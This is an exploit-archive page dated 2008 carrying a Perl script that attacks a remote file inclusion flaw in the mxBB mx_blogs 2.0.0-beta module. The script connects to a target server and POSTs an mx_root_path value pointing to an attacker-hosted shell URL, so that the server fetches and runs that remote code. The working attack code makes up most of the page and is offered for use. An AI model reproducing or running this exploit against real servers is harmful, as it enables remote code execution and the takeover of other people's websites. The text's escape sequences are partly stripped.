mxBB Module mx_blogs 2.0.0-beta Remote File Inclusion Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : mxBB Module mx_blogs 2.0.0-beta Remote File Inclusion Exploit
# Published : 2008-03-30
# Author : bd0rk
# Previous Title : Smoothflash (admin_view_image.php cid) SQL Injection Vulnerability
# Next Title : KISGB <= (tmp_theme) 5.1.1 Local File Inclusion Vulnerability

# mxBB Module mx_blogs 2.0.0-beta Remote File Include Exploit
#
# Vendor: http://www.mx-system.com
#
# Download: http://www.mx-system.com/index.php?page=4&action=file&file_id=405
#
# Vulncode in: /includes/functions_weblog.php line 24
#
# Greetz: str0ke, TheJT, rgod, Vallani, DNX, NBBN

use Getopt::Long;
use URI::Escape;
use IO::Socket;

$shellcode = "Insert the url to shell here";

main();

sub usage
{
print "mxBB Module mx_blogs 2.0.0-beta Remote File Include Expln";
print "by bd0rk <www.soh-crew.it.tt>n";
print "-t, --ttargett(someone.com)n";
print "-f, --tshellt(url to your shellcode)n";
print "-d, --dirt(/mx_blogs)n";
exit;
}

sub main
{
GetOptions ('t|target=s' => $target,'f|shell=s' => $shell,'d|dir=s' => $dir);
usage() unless $target;
$shellcode = $shell unless !$shell;
$url = uri_escape($shellcode);

$sock = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$target",PeerPort=>"80") or die "nConnection() failed.n";

print "nConnected to ".$target.", injecting shellcode.n";
$sendurl = "mx_root_path=".$url."";
$sendlen = length($sendurl);
print $sock "POST ".$dir."/includes/functions_weblog.php? HTTP/1.1n";
print $sock "Host: ".$target."n";
print $sock "Connection: closen";
print $sock "Content-Type: application/x-www-form-urlencodedn";
print $sock "Content-Length: ".$sendlen."nn";
print $sock $sendurl;
print "Attempted to include shellcode, Response:nn";
while($recvd = <$sock>)
{
print " ".$recvd."";
}
exit;
}

# www.Syue.com [2008-03-30]